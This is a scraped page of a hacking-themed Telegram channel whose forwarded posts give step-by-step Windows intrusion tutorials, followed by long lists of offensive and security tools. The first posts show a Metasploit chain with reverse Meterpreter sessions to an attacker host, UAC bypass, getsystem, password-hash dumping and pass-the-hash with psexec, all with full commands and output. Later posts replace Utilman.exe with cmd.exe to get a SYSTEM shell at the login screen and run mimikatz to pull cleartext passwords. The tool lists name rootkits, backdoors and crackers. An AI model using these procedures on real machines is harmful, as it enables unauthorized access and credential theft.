UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.1K links
๐Ÿฆ‘ Undercode Cyber World!
@UndercodeCommunity


1๏ธโƒฃ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2๏ธโƒฃ Cyber & Tech NEWS:
@Undercode_News

3๏ธโƒฃ CVE @Daily_CVE

โœจ Web & Services:
โ†’ Undercode.help
Download Telegram
Forwarded from U
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘if You think that cracking LM Hashes is too slow, you can use the psexec module in Metasploit to bypass the hash value. The method of bypassing the hash value using the psexec module will be described below:
instagram.com/UndercOdeTestingCompany

๐Ÿฆ‘ ๐•ƒ๐”ผ๐•‹๐•Š ๐•Š๐•‹๐”ธโ„๐•‹ :

1) By running the executable file backup.exe created by Veil on the target host (Windows 7), successfully obtain an active remote session, as shown below:
[*] Started reverse handler on 192.168.6.103:4444
[*] Starting the payload handlerโ€ฆ
[*] Sending stage (769536 bytes) to 192.168.6.106
[*] Meterpreter session 1 opened (192.168.6.103:4444 -> 192.168.6.106:49160) at 2014-07-22 15:29:55 +0800
From the above information, you can see that Session 1 was successfully opened.

2) View user rights information. The execution command is as follows:
meterpreter > getuid
Server username: WIN-RKPKQFBLG6C\lyw
From the output information, you can see that the user's permission is a normal permission. Next, bypass the UAC using the bypassuac module.

3) Set lyw users to bypass UAC. The execution command is as follows:
meterpreter > background
[*] Backgrounding session 1โ€ฆ
msf exploit(handler) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set session 1
session => 1
msf exploit(bypassuac) > exploit
[*] Started reverse handler on 192.168.6.103:4444
[*] UAC is Enabled, checking levelโ€ฆ
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuingโ€ฆ
[+] Part of Administrators group! Continuingโ€ฆ
[*] Uploaded the agent to the filesystemโ€ฆ.
[*] Uploading the bypass UAC executable to the filesystemโ€ฆ
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (769536 bytes) to 192.168.6.106
[*] Meterpreter session 3 opened (192.168.6.103:4444 -> 192.168.6.106:49160) at 2014-07-22 15:34:38 +0800
meterpreter > getsystem
โ€ฆgot system (via technique 1).
meterpreter > getuid

> Server username: NT AUTHORITY\SYSTEM
From the output information, you can see that the lyw user authority is SYSTEM at this time.

4) View the hash password values of all users on the target host. The execution command is as follows:
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot keyโ€ฆ
[*] Calculating the hboot key using SYSKEY 45fa5958a01cf2b66b73daa174b19daeโ€ฆ
[*] Obtaining the user list and keysโ€ฆ
[*] Decrypting user keysโ€ฆ
[*] Dumping password hintsโ€ฆ
Test:"123"
[*] Dumping password hashesโ€ฆ
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Test:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:daf26fce5b47e01aae0f919f529926e3:::
lyw:1003:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
alice:1004:aad3b435b51404eeaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec:::
From the output, you can see that the hashed password values of six users were captured. At this point, you can use the SMB psexec module to bypass the hash value.


5) Run session 2 in the background. The execution command is as follows:
meterpreter > background
[*] Backgrounding session 2โ€ฆ


6) Use the SMB psexec module and set the required configuration option parameters. The execution command is as follows:
msf exploit(bypassuac) > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.6.114
RHOST => 192.168.6.114
msf exploit(psexec) > set SMBUser Test
SMBUser => alice
msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:
22315d6ed1a7d5f8a7c98c40e9fa2dec
SMBPass => aad3b435b51404eeaad3b435b51404ee:22315d6ed1a7d5f8a7c98c40e9fa2dec
Forwarded from U
7) Start the attack. The execution command is as follows:
msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.6.103:4444
[*] Connecting to the serverโ€ฆ
[*] Authenticating to 192.168.6.114:445|WORKGROUP as user 'lyw'โ€ฆ
[*] Uploading payloadโ€ฆ
[*] Created \XBotpcOY.exeโ€ฆ
[*] Deleting \XBotpcOY.exeโ€ฆ
[*] Sending stage (769536 bytes) to 192.168.6.114
[*] Meterpreter session 3 opened (192.168.6.103:4444 -> 192.168.6.114:49159) at 2014-07-22 17:32:13 +0800
From the output information, you can see that the user using "Test" successfully opened a session

Written by UndercOde
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Forwarded from U
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Bypassing Utilman Login for Windows by Underc0de :

> Utilman is a Windows accessibility manager.

> This program is the most important file stored in the Windows system files. Usually

> it is automatically created during the system installation process, which is very important for the normal operation of the system. Under Windows, you can use the Windows + U key combination to call the Utilman process. This section describes how to bypass the Utilman program and log in to the system to run other operations.
instagram.com/UndercOdeTestingCompany

๐Ÿฆ‘ ๐•ƒ๐”ผ๐•‹๐•Š ๐•Š๐•‹๐”ธโ„๐•‹ :

1) In the Windows interface, start Kali Linux LiveCD

2) Select Live (686-pae) on this interface, and press Enter to start Kali Linux

3) the interface displays files and folders in the Windows operating system. Here open the Windows | System32 folder in turn

4) Find the Utilman.exe file in the folder and rename the file to Utilman.old. Then copy the cmd.exe file and change its file name to Utilman.exe.

5) Now close Kali Linux and start Windows. Press the Windows + u key combination on the login interface

6 ) From this interface, you can see that a command prompt window opens. In this window, you can execute some DOS commands. For example, using the whoami command to view user information will display the cmd interface

7) As can be seen from the output interface, the current user has the highest authority. At this point, you can perform any operation.
After learning to bypass Utilman login, you can use the mimikatz tool to restore the user's password when the target system is locked.

> The following will introduce the use of mimikatz tools to recover passwords from locked state.

8) You need to do some preparation before operation. First download the mimikatz tool from http://blog.gentilkiwi.com/mimikatz(Official ) . Its package name is mimikatz_trunk.zip. Extract the package and save it to a USB disk. In this example, save the decompressed file to the mimikatz directory of the USB flash drive.

๐Ÿฆ‘ well now see next Step> Cracking the Windows

Written by UndercOde
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Forwarded from U
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Now Let s Crack The Windows Login

> Install Utilman Bypass in the system to be able to execute some commands.
t.me/UndercOdeTesting

1) Press the Windows + u key combination on the locked Windows desktop

2) by default, when the Windows + u key combination is used to start a DOS window, the height of the window buffer is 30. When outputting more data, you will not see everything. Therefore, you need to increase the height of the window in the properties menu of the DOS window

3) select the "Layout" tab on this interface and modify the height value below the screen buffer size. Then click the "OK" button to scroll the mouse to see everything.

4) At this point, execute some commands on the command line to recover the Windows user password. First confirm the permissions of the current user, execute the command as follows:

C:\Windows\system32> UndercOde
nt authority\system

5) Enter the USB disk and check the contents of the disk. The USB disk number F: in this example, the execution command is as follows:
C:\Windows\system32> F:
F:\>dir mimikatz
2019/05/26 03:45 4,311 README.md
2019/06/15 04:54 Win32
2019/06/15 04:54 x64

6) From the output, you can see that there are three files in the mimikatz directory. Win32 and x64 represent the two versions of mimikatz. Choose the corresponding version according to your system architecture. The operating system in this example is 32-bit, so Win32 is chosen.

7) View the contents of the Win32 directory:
F:\>cd mimikatz
F:\Mimikatz>cd win32
F:\Mimikatz\Win32>dir
2019/06/15 04:54 29,056 mimidrv.sys
2019/06/15 04:54 189,936 mimikatz.exe
2019/06/15 04:54 27,632 mimilib.dll

8) From the output, you can see that there are three files in the Win32 directory. Among them, mimikatz is an executable file.

๐Ÿฆ‘ Run the mimikatz program :

The mimikatz # prompt indicates that you have successfully logged in to the mimikatz program.

1) Recover password. The execution command is as follows:
mimikatz # sekurlsa::logonPasswords
or:

2) mimikatz # sekurlsa::logonPasswords full

๐Ÿฆ‘ The following information is output:
Authentication Id : 0; 10201252 (00000000:009ba8a4)
Session : Interactive from 1
User Name : UndercOde
Domain : Windows7Test
SID : S-1-5-21-2306344666-604645106-2825843324-1001
msv :
[00010000] CredentialKeys
* NTLM : 32ed87bdb5fdc5e9cba88547376818d4
* SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
[00000003] Primary
* Username : UndercOde
* Domain : Windows7Test
* NTLM : 32ed87bdb5fdc5e9cba88547376818d4
* SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
tspkg :

๐Ÿฆ‘ wdigest :
* Username : UndercOde
* Domain : Windows7Test
* Password : 123456

> kerberos :
* Username : UndercOde
* Domain : Windows7Test
* Password : (null)

> ssp :
credman :

๐Ÿฆ‘ From the above output information, you can see all the information of the locked user. Such as user name, various encrypted HASH values, domain name and password.

Written by UndercOde
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Forwarded from U
Forwarded from U
Those Cracking Tutorials for learn, Not for steal ๐Ÿฆ‘
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Termux-Linux Tools lastest :
pinterest.com/UndercOdeOfficial

android-apktool 1.5.2 A tool for reengineering Android apk files. http://forum.xda-developers.com/showthread.php?t=1755243
android-ndk r9c Android C/C++ developer kit. http://developer.android.com/sdk/ndk/index.html
android-sdk-platform-tools r19 Platform-Tools for Google Android SDK (adb and fastboot) http://developer.android.com/sdk/index.html
android-sdk r22.3 Google Android SDK http://developer.android.com/sdk/index.html
android-udev-rules 8340.db8ef4a Android udev rules. https://github.com/bbqlinux/android-udev-rules
androidsniffer 0.1 A perl script that lets you search for 3rd party passwords, dump the call log, dump contacts, dump wireless configuration, and more. http://packetstormsecurity.com/files/97464/Andr01d-Magic-Dumper.1.html
anontwi 1.0 A free software python client designed to navigate anonymously on social networks. It supports Identi.ca and Twitter.com. http://anontwi.sourceforge.net/
aphopper 0.3 AP Hopper is a program that automatically hops between access points of different wireless networks. http://aphopper.sourceforge.net/
apnbf 0.1 A small python script designed for enumerating valid APNs (Access Point Name) on a GTP-C speaking device. http://www.c0decafe.de/
arachni 1.0.6 A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. https://www.arachni-scanner.com
arduino 1.0.5 Arduino SDK (includes patched avrdude and librxtx) http://arduino.cc/en/Main/Software
argus 3.0.8 Network monitoring tool with flow control. http://qosient.com/argus/
argus-clients 3.0.8 Network monitoring client for Argus. http://qosient.com/argus/
armitage 141120 A graphical cyber attack management tool for Metasploit. http://www.fastandeasyhacking.com/
arp-scan 1.9 A tool that uses ARP to discover and fingerprint IP hosts on the local network http://www.nta-monitor.com/tools/arp-scan/
arpalert 2.0.12 Monitor ARP changes in ethernet networks http://www.arpalert.org/
arpantispoofer 1.0.1.32 A utility to detect and resist BIDIRECTIONAL ARP spoofing. It can anti-spoof for not only the local host, but also other hosts in the same subnet. It is also a handy helper for gateways which don't work well with ARP. http://arpantispoofer.sourceforge.net/
arpoison 0.6 The UNIX arp cache update utility http://www.arpoison.net
arpon 2.7 A portable handler daemon that make ARP protocol secure in order to avoid the Man In The Middle (MITM) attack through ARP Spoofing, ARP Cache Poisoning or ARP Poison Routing (APR) attacks. http://arpon.sourceforge.net/
arpwner 26.f300fdf GUI-based python tool for arp posioning and dns poisoning attacks. https://github.com/ntrippar/ARPwner
artillery 1.0.2 A combination of a honeypot, file-system monitoring, system hardening, and overall health of a server to create a comprehensive way to secure a system https://www.trustedsec.com/downloads/artillery/
asleap 2.2 Actively recover LEAP/PPTP passwords. http://www.willhackforsushi.com/Asleap.html
asp-audit 2BETA An ASP fingerprinting tool and vulnerability scanner. http://seclists.org/basics/2006/Sep/128
athena-ssl-scanner 0.5.2 a SSL cipher scanner that checks all cipher codes. It can identify about 150 different ciphers. http://packetstormsecurity.com/files/93062/Athena-SSL-Cipher-Scanner.html
atstaketools 0.1 This is an archive of various @Stake tools that help perform vulnerability scanning and analysis, information gathering, password auditing, and forensics. http://packetstormsecurity.com/files/50718/AtStakeTools.zip.html
autopsy 2.24 A GUI for The Sleuth Kit. http://www.sleuthkit.org/autopsy
azazel 10.401e3aa A userland rootkit based off of the original LD_PRELOAD technique from Jynx rootkit. https://github.com/chokepoint/azazel
backcookie 44.cbf5b8b Small backdoor using cookie. https://github.com/mrjopino/backcookie

@UndercOdeOfficial
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Termux-Linux Tools lastest Part 2 :
pinterest.com/UndercOdeOfficial

backdoor-factory 98.89d87b2 Patch win32/64 binaries with shellcode. https://github.com/secretsquirrel/the-backdoor-factory
backfuzz 36.8e54ed6 A network protocol fuzzing toolkit. https://github.com/localh0t/backfuzz
balbuzard 65.546c5dcf629c A package of malware analysis tools in python to extract patterns of interest from suspicious files (IP addresses, domain names, known file headers, interesting strings, etc). https://bitbucket.org/decalage/balbuzard/
bamf-framework 35.30d2b4b A modular framework designed to be a platform to launch attacks against botnets. https://github.com/bwall/BAMF
basedomainname 0.1 Tool that can extract TLD (Top Level Domain), domain extensions (Second Level Domain + TLD), domain name, and hostname from fully qualified domain names. http://www.morningstarsecurity.com/research
batman-adv 2013.4.0 batman kernel module, (included upstream since .38) http://www.open-mesh.net/
bbqsql 1.2 SQL injection exploitation tool. https://github.com/neohapsis/bbqsql
bdfproxy 38.43e83e4 Patch Binaries via MITM: BackdoorFactory + mitmProxy https://github.com/secretsquirrel/BDFProxy
bed 0.5 Collection of scripts to test for buffer overflows, format string vulnerabilities. http://www.aldeid.com/wiki/Bed
beef 0.4.5.0.181.g80a9f8e The Browser Exploitation Framework that focuses on the web browser http://beefproject.com/
beholder 0.8.9 A wireless intrusion detection tool that looks for anomalies in a wifi environment. http://www.beholderwireless.org/
beleth 36.0963699 A Multi-threaded Dictionary based SSH cracker. https://github.com/chokepoint/Beleth
bfbtester 2.0.1 Performs checks of single and multiple argument command line overflows and environment variable overflows http://sourceforge.net/projects/bfbtester/
bgp-md5crack 0.1 RFC2385 password cracker http://www.c0decafe.de/
bing-ip2hosts 0.4 Enumerates all hostnames which Bing has indexed for a specific IP address. http://www.morningstarsecurity.com/research/bing-ip2hosts
bing-lfi-rfi 0.1 This is a python script for searching Bing for sites that may have local and remote file inclusion vulnerabilities. http://packetstormsecurity.com/files/121590/Bing-LFI-RFI-Scanner.html
binwalk 2.0.1 A tool for searching a given binary image for embedded files. http://binwalk.org
binwally 3.ca092a7 Binary and Directory tree comparison tool using the Fuzzy Hashing concept (ssdeep). https://github.com/bmaia/binwally
bios_memimage 1.2 A tool to dump RAM contents to disk (aka cold boot attack). http://citp.princeton.edu/memory/code/
birp 60.1d7c49f A tool that will assist in the security assessment of mainframe applications served over TN3270. https://github.com/sensepost/birp
bittwist 2.0 A simple yet powerful libpcap-based Ethernet packet generator. It is designed to complement tcpdump, which by itself has done a great job at capturing network traffic. http://bittwist.sourceforge.net/
bkhive 1.1.1 Program for dumping the syskey bootkey from a Windows NT/2K/XP system hive. http://sourceforge.net/projects/ophcrack
blackarch-menus 0.2 BlackArch specific XDG-compliant menu http://www.blackarch.org/
blackhash 0.2 Creates a filter from system hashes http://16s.us/blackhash/
bletchley 0.0.1 A collection of practical application cryptanalysis tools. https://code.google.com/p/bletchley/
blindelephant 7 A web application fingerprinter. Attempts to discover the version of a (known) web application by comparing static files at known locations http://blindelephant.sourceforge.net/
blindsql 1.0 Set of bash scripts for blind SQL injection attacks http://www.enye-sec.org/programas.html
bluebox-ng 66.4a73bb4 A GPL VoIP/UC vulnerability scanner. https://github.com/jesusprubio/bluebox-ng
bluebugger 0.1 An implementation of the bluebug technique which was discovered by Martin Herfurt. http://packetstormsecurity.com/files/54024/bluebugger.1.tar.gz.html


@UndercOdeOfficial
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Termux-Linux Tools lastest Part 3 :
pinterest.com/UndercOdeOfficial

bluepot 0.1 A Bluetooth Honeypot written in Java, it runs on Linux https://github.com/andrewmichaelsmith/bluepot/
blueprint 0.1_3 A perl tool to identify Bluetooth devices. http://trifinite.org/trifinite_stuff_blueprinting.html
blueranger 1.0 A simple Bash script which uses Link Quality to locate Bluetooth device radios. http://www.hackfromacave.com/projects/blueranger.html
bluesnarfer 0.1 A bluetooth attacking tool http://www.alighieri.org/project.html
bmap-tools 3.2 Tool for copying largely sparse files using information from a block map file. http://git.infradead.org/users/dedekind/bmap-tools.git
bob-the-butcher 0.7.1 A distributed password cracker package. http://btb.banquise.net/
bowcaster 0.1 This framework, implemented in Python, is intended to aid those developing exploits by providing useful set of tools and modules, such as payloads, encoders, connect-back servers, etc. Currently the framework is focused on the MIPS CPU architecture, but the design is intended to be modular enough to support arbitrary architectures. https://github.com/zcutlip/bowcaster
braa 0.82 A mass snmp scanner http://s-tech.elsat.net.pl/braa/
braces 0.4 A Bluetooth Tracking Utility. http://braces.shmoo.com/
bruteSniffing_Ficher A multiplatform python hacking tool for bruteforcing, cloning, fishing, information gathering and sniffing. https://github.com/programmingAthlete/BruteSniffing_Fisher
brutus 2 One of the fastest, most flexible remote password crackers you can get your hands on. http://www.hoobie.net/brutus/
bsdiff 4.3 bsdiff and bspatch are tools for building and applying patches to binary files. http://www.daemonology.net/bsdiff/
bsqlbf 2.7 Blind SQL Injection Brute Forcer. http://code.google.com/p/bsqlbf-v2/
bss 0.8 Bluetooth stack smasher / fuzzer http://www.secuobs.com/news/15022006-bss_0_8.shtml
bt_audit 0.1.1 Bluetooth audit http://www.betaversion.net/btdsd/download/
btcrack 1.1 The world's first Bluetooth Pass phrase (PIN) bruteforce tool. Bruteforces the Passkey and the Link key from captured Pairing exchanges. http://www.nruns.com/_en/security_tools_btcrack.php
btscanner 2.1 Bluetooth device scanner. http://www.pentest.co.uk
bulk-extractor 1.5.5 Bulk Email and URL extraction tool. https://github.com/simsong/bulk_extractor
bully 19.ba33677 A wifi-protected-setup (WPS) brute force attack tool. http://code.google.com/p/bully/
bunny 0.93 A closed loop, high-performance, general purpose protocol-blind fuzzer for C programs. http://code.google.com/p/bunny-the-fuzzer/
burpsuite 1.6 An integrated platform for attacking web applications (free edition). http://portswigger.net/burp/
buttinsky 138.1a2a1b2 Provide an open source framework for automated botnet monitoring. https://github.com/buttinsky/buttinsky
bvi 1.4.0beta A display-oriented editor for binary files operate like "vi" editor. http://bvi.sourceforge.net/
cadaver 0.23.3 Command-line WebDAV client for Unix http://www.webdav.org/cadaver
canari 1.1 A transform framework for maltego http://www.canariproject.com/
cansina 93.abc6577 A python-based Web Content Discovery Tool. https://github.com/deibit/cansina
capstone 3.0 A lightweight multi-platform, multi-architecture disassembly framework. http://www.capstone-engine.org/index.html
carwhisperer 0.2 Intends to sensibilise manufacturers of carkits and other Bluetooth appliances without display and keyboard for the possible security threat evolving from the use of standard passkeys. http://trifinite.org/trifinite_stuff_carwhisperer.html
casefile 1.0.1 The little brother to Maltego without transforms, but combines graph and link analysis to examine links between manually added data to mind map your information http://www.paterva.com/web6/products/casefile.php
cdpsnarf 0.1.6 Cisco discovery protocol sniffer. https://github.com/Zapotek/cdpsnarf

@UndercOdeOfficial
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Termux-Linux Tools lastest Part 4 :
pinterest.com/UndercOdeOfficial

cewl 4.3 A custom word list generator http://www.digininja.org/projects/cewl.php
cflow 1.4 A C program flow analyzer. http://www.gnu.org/software/cflow/
chaosmap 1.3 An information gathering tool and dns / whois / web server scanner http://freecode.com/projects/chaosmap
chaosreader 0.94 A freeware tool to trace tcp, udp etc. sessions and fetch application data from snoop or tcpdump logs. http://chaosreader.sourceforge.net/
chapcrack 17.ae2827f A tool for parsing and decrypting MS-CHAPv2 network handshakes. https://github.com/moxie0/chapcrack
check-weak-dh-ssh 0.1 Debian OpenSSL weak client Diffie-Hellman Exchange checker. http://packetstormsecurity.com/files/66683/check_weak_dh_ssh.pl.bz2.html
checkiban 0.2 Checks the validity of an International Bank Account Number (IBAN). http://kernel.embedromix.ro/us/
checksec 1.5 The checksec.sh script is designed to test what standard Linux OS and PaX security features are being used. http://www.trapkit.de/tools/checksec.html
chiron 0.7 An all-in-one IPv6 Penetration Testing Framework. http://www.secfu.net/tools-scripts/
chkrootkit 0.50 Checks for rootkits on a system http://www.chkrootkit.org/
chntpw 140201 Offline NT Password Editor - reset passwords in a Windows NT SAM user database file http://pogostick.net/~pnh/ntpasswd/
chownat 0.08b Allows two peers behind two separate NATs with no port forwarding and no DMZ setup on their routers to directly communicate with each other http://samy.pl/chownat/
chrome-decode 0.1 Chrome web browser decoder tool that demonstrates recovering passwords. http://packetstormsecurity.com/files/119153/Chrome-Web-Browser-Decoder.html
chromefreak 22.336e323 A Cross-Platform Forensic Framework for Google Chrome http://osandamalith.github.io/ChromeFreak/
cidr2range 0.9 Script for listing the IP addresses contained in a CIDR netblock http://www.cpan.org/authors/id/R/RA/RAYNERLUC
ntruder 0.2.0 An automatic pentesting tool to bypass captchas. http://cintruder.sourceforge.net/
ciphertest 14.7f49ea7 A better SSL cipher checker using gnutls. https://github.com/OpenSecurityResearch/ciphertest
cirt-fuzzer 1.0 A simple TCP/UDP protocol fuzzer. http://www.cirt.dk/
cisco-auditing-tool 1 Perl script which scans cisco routers for common vulnerabilities. Checks for default passwords, easily guessable community names, and the IOS history bug. Includes support for plugins and scanning multiple hosts. http://www.scrypt.net
cisco-global-exploiter 1.3 A perl script that targets multiple vulnerabilities in the Cisco Internetwork Operating System (IOS) and Catalyst products. http://www.blackangels.it
cisco-ocs 0.2 Cisco Router Default Password Scanner. http://www.question-defense.com/2013/01/11/ocs-version-2-release-ocs-cisco-router-default-password-scanner
cisco-router-config 1.1 copy-router-config and merge-router-config to copy and merge Cisco Routers Configuration
cisco-scanner 0.2 Multithreaded Cisco HTTP vulnerability scanner. Tested on Linux, OpenBSD and Solaris. http://wayreth.eu.org/old_page/
cisco-torch 0.4b Cisco Torch mass scanning, fingerprinting, and exploitation tool. http://www.arhont.com
cisco5crack 2.c4b228c Crypt and decrypt the cisco enable 5 passwords. https://github.com/madrisan/cisco7crack
cisco7crack 2.f1c21dd Crypt and decrypt the cisco enable 7 passwords. https://github.com/madrisan/cisco7crack
ciscos 1.3 Scans class A, B, and C networks for cisco routers which have telnet open and have not changed the default password from cisco.
climber 23.f614304 Check UNIX/Linux systems for privilege escalation. https://github.com/raffaele-forte/climber
clusterd 129.0f04a49 Automates the fingerprinting, reconnaissance, and exploitation phases of an application server attack. https://github.com/hatRiot/clusterd
cms-explorer 1.0 Designed to reveal the specific modules, plugins, components and themes that various cms driven websites are running http://code.google.com/p/cms-explorer

@UndercOdeOfficial
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Termux-Linux Tools lastest Part 5 :
pinterest.com/UndercOdeOfficial

cms-few 0.1 Joomla, Mambo, PHP-Nuke, and XOOPS CMS SQL injection vulnerability scanning tool written in Python. http://packetstormsecurity.com/files/64722/cms_few.py.txt.html
codetective 37.f94d9e8 A tool to determine the crypto/encoding algorithm used according to traces of its representation. https://www.digitalloft.org/init/plugin_wiki/page/codetective
complemento 0.7.6 A collection of tools for pentester: LetDown is a powerful tcp flooder ReverseRaider is a domain scanner that use wordlist scanning or reverse resolution scanning Httsquash is an http server scanner, banner grabber and data retriever http://complemento.sourceforge.net
conpot 0.3.1 ICS honeypot with the goal to collect intelligence about the motives and methods of adversaries targeting industrial control systems url="http://conpot.org"
conscan 1.1 A blackbox vulnerability scanner for the Concre5 CMS. http://nullsecurity.net/tools/scanner.html
cookie-cadger 1.07 An auditing tool for Wi-Fi or wired Ethernet connections. https://cookiecadger.com/
cowpatty 4.6 Wireless WPA/WPA2 PSK handshake cracking utility http://www.wirelessdefence.org/Contents/Files/
cpfinder 0.1 This is a simple script that looks for administrative web interfaces. http://packetstormsecurity.com/files/118851/Control-Panel-Finder-Script.html
cppcheck 1.67 A tool for static C/C++ code analysis http://cppcheck.wiki.sourceforge.net/
cpptest 1.1.2 A portable and powerful, yet simple, unit testing framework for handling automated tests in C++. http://cpptest.sourceforge.net/
crackhor 2.ae7d83f A Password cracking utility. https://github.com/CoalfireLabs/crackHOR
crackle 39.3e93196 Crack and decrypt BLE encryption https://github.com/mikeryan/crackle/
crackserver 31.c268a80 An XMLRPC server for password cracking. https://github.com/averagesecurityguy/crack
create-ap 112.1c89b44 This script creates a NATed or Bridged WiFi Access Point. https://github.com/oblique/create_ap
creddump 0.3 A python tool to extract various credentials and secrets from Windows registry hives. https://code.google.com/p/creddump/
creds 8340.db8ef4a Harvest FTP/POP/IMAP/HTTP/IRC credentials along with interesting data from each of the protocols. https://github.com/DanMcInerney/creds.py
creepy 137.9f60449 A geolocation information gatherer. Offers geolocation information gathering through social networking platforms. http://github.com/ilektrojohn/creepy.git
crunch 3.6 A wordlist generator for all combinations/permutations of a given character set. http://sourceforge.net/projects/crunch-wordlist/
cryptcat 1.2.1 A lightweight version of netcat with integrated transport encryption capabilities. http://sourceforge.net/projects/cryptcat
crypthook 17.0728cd1 TCP/UDP symmetric encryption tunnel wrapper. https://github.com/chokepoint/CryptHook
cryptonark 0.4.9 SSL security checker. http://blog.techstacks.com/cryptonark.html
csrftester 1.0 The OWASP CSRFTester Project attempts to give developers the ability to test their applications for CSRF flaws. http://www.owasp.org/index.php/Category:OWASP_CSRFTester_Project
ctunnel 0.6 Tunnel and/or proxy TCP or UDP connections via a cryptographic tunnel. http://nardcore.org/ctunnel
cuckoo 1.1.1 A malware analysis system. http://cuckoosandbox.org/
cupp 3.0 Common User Password Profiler http://www.remote-exploit.org/?page_id=418
cutycapt 10 A Qt and WebKit based command-line utility that captures WebKit's rendering of a web page. http://cutycapt.sourceforge.net/
cvechecker 3.5 The goal of cvechecker is to report about possible vulnerabilities on your system, by scanning the installed software and matching the results with the CVE database. http://cvechecker.sourceforge.net/

d4n155 1.50 Security audit tool for smart and dynamic wordlist using Google hacking attack and some calculations, after analysis is generated a graphical report. https://github.com/adasecurity/D4N155

@UndercOdeOfficial
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Termux-Linux Tools lastest Part 6 :
instagram.com/UndercOdeTestingCompany


darkbing 0.1 A tool written in python that leverages bing for mining data on systems that may be susceptible to SQL injection. http://packetstormsecurity.com/files/111510/darkBing-SQL-Scanner.1.html
darkd0rk3r 1.0 Python script that performs dork searching and searches for local file inclusion and SQL injection errors. http://packetstormsecurity.com/files/117403/Dark-D0rk3r.0.html
darkjumper 5.8 This tool will try to find every website that host at the same server at your target http://sourceforge.net/projects/darkjumper/
darkmysqli 1.6 Multi-Purpose MySQL Injection Tool https://github.com/BlackArch/darkmysqli
darkstat 3.0.718 Network statistics gatherer (packet sniffer) http://dmr.ath.cx/net/darkstat/
davoset 1.2.3 A tool for using Abuse of Functionality and XML External Entities vulnerabilities on some websites to attack other websites. http://websecurity.com.ua/davoset/
davtest 1.0 Tests WebDAV enabled servers by uploading test executable files, and then (optionally) uploading files which allow for command execution or other actions directly on the target http://code.google.com/p/davtest/
dbd 1.50 A Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. https://github.com/gitdurandal/dbd
dbpwaudit 0.8 A Java tool that allows you to perform online audits of password quality for several database engines http://www.cqure.net/wp/dbpwaudit/
dc3dd 7.1.614 A patched version of dd that includes a number of features useful for computer forensics http://sourceforge.net/projects/dc3dd
dcfldd 1.3.4.1 DCFL (DoD Computer Forensics Lab) dd replacement with hashing http://dcfldd.sourceforge.net/
ddrescue 1.19 GNU data recovery tool http://www.gnu.org/software/ddrescue/ddrescue.html
decker 0.0.11 A penetration testing orchestration and automation framework, which allows writing declarative, reusable configurations capable of ingesting variables and using outputs of tools it has run as inputs to others.
